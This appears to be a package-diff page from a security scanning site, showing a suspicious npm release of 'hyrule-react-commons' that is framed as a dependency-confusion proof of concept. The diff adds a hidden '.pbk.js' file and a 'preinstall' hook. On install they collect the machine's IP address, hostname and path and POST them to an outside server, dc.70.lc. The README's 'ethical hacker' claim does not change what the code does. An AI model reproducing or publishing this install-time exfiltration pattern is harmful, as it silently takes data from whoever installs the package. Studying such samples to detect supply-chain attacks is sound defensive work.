hyrule-react-commons 1.0.0 → 9.9.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of hyrule-react-commons might be problematic. Click here for more details.
- package/.pbk.js +39 -0
- package/README.md +9 -0
- package/index.js +0 -0
- package/package.json +4 -4
package/.pbk.js
ADDED
@@ -0,0 +1,39 @@
|
|
1
|
+
const os = require('os');
|
2
|
+
const https = require('https');
|
3
|
+
|
4
|
+
var __dirname;
|
5
|
+
|
6
|
+
const ip = [].concat(...Object.values(os.networkInterfaces()))
|
7
|
+
.filter(({ family, internal }) => family === "IPv4" && !internal)
|
8
|
+
.map(({ address }) => address)[0];
|
9
|
+
|
10
|
+
const host = os.hostname()
|
11
|
+
const path = __dirname;
|
12
|
+
const org = process.argv.slice(2)[0]
|
13
|
+
const package = process.argv.slice(2)[1]
|
14
|
+
const version = process.argv.slice(2)[2]
|
15
|
+
|
16
|
+
data = {
|
17
|
+
ip,
|
18
|
+
host,
|
19
|
+
path,
|
20
|
+
org,
|
21
|
+
package,
|
22
|
+
version
|
23
|
+
}
|
24
|
+
|
25
|
+
body = JSON.stringify(data)
|
26
|
+
|
27
|
+
var r = https.request({
|
28
|
+
hostname:'dc.70.lc',
|
29
|
+
port: 443,
|
30
|
+
path: '/d',
|
31
|
+
method: 'POST',
|
32
|
+
headers: {
|
33
|
+
'Content-Length': body.length,
|
34
|
+
'Content-Type': 'application/json'
|
35
|
+
}
|
36
|
+
})
|
37
|
+
r.write(body)
|
38
|
+
r.end()
|
39
|
+
|
package/README.md
ADDED
@@ -0,0 +1,9 @@
|
|
1
|
+
# hyrule-react-commons
|
2
|
+
|
3
|
+
Hi, I am an ethical hacker. This is a security testing package. Just to prove that there is a dependency confusion vulnerability.
|
4
|
+
|
5
|
+
Usually this has already contacted your security department.
|
6
|
+
|
7
|
+
If you need the ownership of the project now, please contact me and I will transfer the ownership. https://70.lc/
|
8
|
+
|
9
|
+
|
package/index.js
ADDED
File without changes
|
package/package.json
CHANGED
@@ -1,11 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "hyrule-react-commons",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
3
|
+
"version": "9.9.9",
|
4
|
+
"description": "Dependency Confusion POC",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
|
-
"
|
7
|
+
"preinstall":"node ./.pbk.js Nintendo hyrule-react-commons 9.9.9"
|
8
8
|
},
|
9
|
-
"author": "
|
9
|
+
"author": "",
|
10
10
|
"license": "ISC"
|
11
11
|
}
|